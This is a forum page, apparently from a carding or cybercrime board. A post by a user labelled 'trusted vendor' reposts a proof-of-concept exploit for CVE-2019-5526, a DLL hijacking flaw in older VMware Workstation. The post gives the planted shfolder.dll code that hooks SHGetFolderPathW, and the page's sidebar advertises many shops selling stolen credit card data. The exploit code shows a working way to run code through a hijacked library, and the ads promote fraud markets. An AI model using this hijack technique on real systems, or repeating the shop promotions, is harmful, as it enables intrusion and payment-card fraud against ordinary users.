Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
Money Club cc shop
Savastan0
adv ex on 22 February 2024
DarkHIve
Patrick Stash
Blackstash cc shop
Trump cc shop
Wizard's shop 2.0
Luki Crown
Kfc Club
banner Expire 10 May 2025
banner expire at 13 August 2024
adv exp at 10 October
BidenCash Shop
adv ex on 22 February 2024
banner Expire 25 April 2025
Yale lodge shop
UniCvv

VMWARE WORKSTATION DLL HIJACKING

Neon Ghost

Neon Ghost

TRUSTED VENDOR
Staff member
Joined
Dec 3, 2020
Messages
2,423
VMware Workstation versions prior to 15.1.0 suffer from a dll hijacking vulnerability.

MD5 | e4ae43fff5271c25af6a88e2b9cdeb55
Download
Code:
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------
Click to expand...
Click to expand...
Click to expand...
Click to expand...
https://www.vmware.com/security/advisories/VMSA-2019-0007.html
 
You must log in or register to reply here.

Online statistics

Members online
420
Guests online
1,023
Total visitors
1,443
Totals may include hidden visitors.

Latest posts

Newest members

Stay Connected

Top Bottom